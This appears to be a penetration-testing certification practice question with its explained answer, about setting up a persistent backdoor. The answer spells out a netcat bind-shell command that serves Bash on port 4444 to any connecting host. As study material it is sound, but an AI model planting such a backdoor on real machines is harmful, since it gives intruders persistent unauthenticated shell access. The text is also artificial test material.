A penetration tester is tasked with establishing a simple backdoor on a compromised Linux machine to maintain access for future exploitation. The tester has decided to use a commonly available network utility to listen on an arbitrary port for incoming connections. Which of the following commands should the tester use to create a persistent listening backdoor on port 4444 that executes a Bash shell for any connecting IP?
The correct answer is nc -lkp 4444 -e /bin/bash. This command utilizes the network utility to listen (-l) persistently with the keep-alive option (-k) on port 4444 (-p 4444), and executes (-e) the Bash shell /bin/bash when a connection is made. Hence, it creates a backdoor that can be accessed by the tester later. The incorrect options do not correctly use the switches needed for persistent listening or do not execute a Bash shell upon connection.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What does the command 'nc' stand for and what is it used for?
Open an interactive chat with Bash
What do the options -l, -k, and -e signify in the command 'nc -lkp 4444 -e /bin/bash'?
Open an interactive chat with Bash
Why is port 4444 commonly used for backdoors and what does it signify?